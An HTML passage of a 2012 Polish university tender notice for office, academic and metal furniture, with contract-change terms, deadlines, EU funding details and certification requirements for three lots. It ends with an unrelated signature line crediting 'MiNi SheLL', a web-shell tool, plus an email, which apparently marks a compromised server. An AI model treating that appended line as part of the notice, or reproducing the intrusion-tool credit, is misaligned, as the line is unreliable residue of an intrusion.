<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiana treści niniejszej umowy może nastąpić wyłącznie w granicach unormowania art. 144 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych i pod rygorem nieważności wymaga formy pisemnego aneksu skutecznego po podpisaniu przez obie Strony.<BR>
2.Zamawiający może wyrazić zgodę na dokonanie istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, wyłącznie w sytuacji:<BR>
1)zmiany terminu dostawy, w sytuacji uzasadnionej, gdy brak możliwości dochowania pierwotnego terminu wynika z przyczyn niezawinionych przez Wykonawcę, np. siła wyższa; Wykonawca na piśmie przedstawi okoliczności uniemożliwiające dochowanie terminu wynikającego z oferty,<BR>
2)zmiany terminu dostawy, w sytuacji gdy brak możliwości dochowania pierwotnego terminu wynika z okoliczności leżących po stronie Zamawiającego.<BR>
3)zmiany zakresu czynności wykonywanych przez podwykonawcę/-ów (dotyczy przypadku, w którym Wykonawca posługuje się potencjałem podwykonawców),<BR>
4)zmiany sposobu realizacji zamówienia z samodzielnej realizacji przez Wykonawcę, na realizację z udziałem podwykonawców, z zastrzeżeniem, iż podwykonawcy będą posiadać właściwości niezbędne, do realizacji zamówienia, <BR>
5)zakończenia serii produkcyjnej danego modelu mebla oraz rozpoczęcia produkcji mebla o nie gorszych parametrach technicznych,<BR>
6)zmiany cen w przypadku, kiedy zmiana ta będzie korzystna dla Zamawiającego tzn. na cenę niższą, na pisemny wniosek jednej ze Stron,<BR>
7)ustawowej zmiany stawek podatkowych (VAT) w okresie obowiązywania umowy. Zamawiający nie dopuszcza możliwości zwiększenia kwoty, o której mowa w § 4 ust. 1 wzoru umowy,<BR>
8)zmiany powszechnie obowiązujących przepisów prawa lub umowy o dofinansowanie w zakresie mającym wpływ na realizację umowy.<BR></p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.us.edu.pl/zamowienia-publiczne/1/d/1<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Śląski, Dział Zamówień Publicznych, 4-113 Katowice, ul. Bankowa 12, pok. 69 IIIp..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2012 godzina 09:30, miejsce: Uniwersytet Śląski, Dział Zamówień Publicznych, 4-113 Katowice, ul. Bankowa 12, pok. 69 IIIp..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia w części A jest realizowany w ramach projektu: Matematyka podstawą sukcesu realizowanego w ramach Programu Operacyjnego  Kapitał Ludzki,  Priorytet IV Szkolnictwo wyższe i nauka, Działanie 4.1 Wzmocnienie i rozwój potencjału dydaktycznego uczelni oraz zwiększenie liczby absolwentów kierunków o kluczowym znaczeniu dla gospodarki opartej na wiedzy, Poddziałanie 4.1.2 Zwiększenie liczby absolwentów kierunków o kluczowym znaczeniu dla gospodarki opartej na wiedzy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> A. Meble biurowe i metalowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z opisem przedmiotu zamówienia - załącznik nr 2A do SIWZ<BR>
A)SZAFY METALOWE DO PRZECHOWYWANIA DOKUMENTACJI I REGAŁY METALOWE:<BR>
- Atest higieniczny na szafy oraz regały metalowe.<BR>
B)KRZESŁA STACJONARNE I OBROTOWE:<BR>
- Atest (sprawozdanie) z badań wytrzymałościowych;<BR>
- Raport z badań dotyczących odporności tapicerki na ścieranie: nie mniej niż 100 000 cykli (Martindale);<BR>
- Raport z badań dotyczących trudnopalności tapicerki przeprowadzony zgodnie z normą EN 1021-1-2:2006.<BR>
C)KRZESŁA AUDYTORYJNE:<BR>
- Atest wytrzymałościowy  w zakresie bezpieczeństwa użytkowania wg normy PN-EN 12727:2004 stopień 4, wydany przez ZBWPM PUR Remodex (lub równoważny);<BR>
- Klasyfikacja ogniowa w zakresie zapalności mebli tapicerskich zgodnie z normą PN-EN 1021-1:2007, PN-EN 1021-2:2007, klasyfikujący produkt jako trudno zapalny wydana przez Instytut Techniki Budowlanej (lub równoważny);<BR>
- Sprawozdanie z badań zapalności mebli klasyfikujące produkt jako trudno zapalny - wydany przez Zachodniopomorski Uniwersytet Technologiczny w Szczecinie -  dot. pulpit składany i panel frontowy (lub równoważny);<BR>
- Atest Higieniczny wydany przez Gdański Uniwersytet Medyczny, Międzywydziałowy Instytut Medycyny Morskiej i Tropikalnej (lub równoważny);<BR>
- Klasyfikacja ogniowa w zakresie wydzielania toksycznych produktów spalania wg kryteriów normy PN/88/B/02855 wydana przez Instytut Techniki Budowlanej w Warszawie(lub równoważny).<BR>
D)MEBLE PŁYTOWE:<BR>
- Atest higieniczny na płytę wiórową użytą do produkcji mebli;<BR>
- Atest higieniczny na obrzeże PCV.<BR>.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.40.00-0, 39.13.00.00-2, 39.16.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> B. Meble akademickie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Według opisu przedmiotu zamówienia - załącznik nr 2B do SIWZ<BR>
- Atest higieniczny na płytę wiórową użytą do produkcji mebli;<BR>
- Atest higieniczny na obrzeże PCV;<BR>
- Atest higieniczny na kleje;<BR>
- Atest higieniczny na powłokę lakierniczą (dot. stelaży metalowych);<BR>
- Oświadczenie o zgodności produkcji mebli z polskimi normami PN-92F-06000/01 oraz PN-92F-06000/02;<BR>
- Atest (sprawozdanie) na trudnopalność tapicerki wg parametrów wskazanych w opisie przedmiotu zamówienia;<BR>
- Atest (sprawozdanie) na trudnościeralność tapicerki wg parametrów wskazanych w opisie przedmiotu zamówienia.<BR>
- Meble winny być wykonane z płyty melaminowanej o grubości 18mm (jeżeli Zamawiający nie wskazał inaczej);<BR>
- Meble winny posiadać okleinę PCV nie mniejszą niż 2 mm;<BR>.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.14.00.00-5, 39.00.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> C. Meble biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Według opisu przedmiotu zamówienia - załącznik nr 2C do SIWZ<BR>
- Meble winny być wykonane z płyty melaminowanej o grubości 18mm (jeżeli Zamawiający nie wskazał inaczej);<BR>
- Blat kuchenny z płyty min. 30mm;<BR>
- Meble winny posiadać okleinę PCV, grubość nie mniejszą niż 1 mm (regały) i 2 mm (blaty);<BR>
- Przekrój stelaża stołów (dla studentów): dla kwadratowych rur min. 30x30 mm, dla stołów z okrągłych rur minimum o 40mm, pod blatem rura wzmacniająca  konstrukcję;<BR>
- Metoda malowania nóg: proszkowa<BR>
- Zamki w drzwiach z kluczem, którym można otworzyć tylko jeden zamek.<BR>.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.00.00-1, 39.13.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com